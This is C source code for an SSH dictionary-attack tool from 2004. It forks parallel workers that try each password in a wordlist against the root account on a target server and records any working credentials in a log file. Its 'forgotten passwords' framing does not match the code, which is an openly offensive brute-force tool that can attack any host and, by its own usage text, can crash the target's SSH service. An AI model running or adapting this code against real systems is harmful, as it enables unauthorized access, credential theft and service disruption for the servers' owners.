/*
 *  ssh-dictattack.c -- a utility to attack sshd against a wordlist, done
 *                      for people who have forgotten their passwords.
 *
 *  You need a installed libssh version with the appropriate headers. Grab
 *  it from: http://www.0xbadc0de.be/libssh/
 *
 *  $ gcc ssh-dictattack.c -o ssh-dictattack -lssh
 *
 *  TODO: - add support for sshd on non standard ports.
 *        - add support for user:pass wordlists.
 *        - add support for attack against specific user.
 *
 *  Copyright (C) 2004 Maik Broemme <mbroemme@plusserver.de>
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <termios.h>
#include <sys/select.h>
#include <sys/time.h>
#include <signal.h>
#include <errno.h>
#include <libssh/libssh.h>
#include <libssh/sftp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <time.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>

int where;

void checkauth(char *user, char *password, char *host) {
	SSH_SESSION *session;
	SSH_OPTIONS *options;
	int argc=1;
	char *argv[]={"none"};
	FILE *fp;

	if ((where % 20) == 0) {
		fp=fopen("ssh-dictattack.log", "a");
		fprintf(fp,"trying ssh %s@%s %s\n", user, host, password);
		fclose(fp);
	}
	where++;
	alarm(10);
	options=ssh_getopt(&argc, argv);
	options_set_username(options, user);
	options_set_host(options, host);
	session=ssh_connect(options);
	if (!session) {
		return;
	}

	if (ssh_userauth_password(session, NULL, password) != AUTH_SUCCESS) {
		ssh_disconnect(session);
		return;
	} 

	fp=fopen("ssh-dictattack-vuln.log", "a+");
	fprintf(fp,"[account] host: %s user: %s pass: %s\n", host, user, password);

	printf("\n");
	printf("[*] -- possible account found --\n");
	printf("[-] user: %s\n", user);
	printf("[-] pass: %s\n", password);
	printf("[-] host: %s\n", host);
	printf("\n");
}

int main(int argc, char **argv) {
	FILE *fp;
	char *c;
	char buff[1024];
	int numforks = 0;
	int maxf = 5;

	if (argc != 4) {
		printf("./ssh-dictattack <remote-ip> <threads> <wordlist>\n");
		printf("  <remote-ip> - a remote ip address where a ssh server runs\n");
		printf("  <threads>   - between 2-(what ulimit defines) be careful because much threads can crash the remote ssh server\n");
		printf("  <wordlist>  - a wordlist which has one possible password each line\n");
		exit(0);
	}

	/* unlink("ssh-dictattack.log"); */

	fp=fopen(argv[3], "r");
	if (fp == NULL) {
		exit(printf("could not open wordlist\n"));
	}

	printf ("openssh and ssh.com dictionary attack utility by mbroemme at plusserver dot de\n");
	printf ("[*] launching attack against %s:22 with %s threads\n", argv[1], argv[2]);

	maxf = atoi(argv[2]);

	while (fgets(buff, sizeof(buff), fp)) {
		c=strchr(buff,'\n');
		if (c != NULL) {
			*c='\0';
		}
		printf ("[+] trying pass: %s\n", buff);

		if (!(fork())) {

			/* child */
			where=0;
			checkauth("root", buff, argv[1]);
			exit(0);
		} else {

			/* parent */
			numforks++;
			if (numforks > maxf) {
				for (numforks; numforks > maxf; numforks--) {
					wait(NULL);
				}
			}
		}
	}
}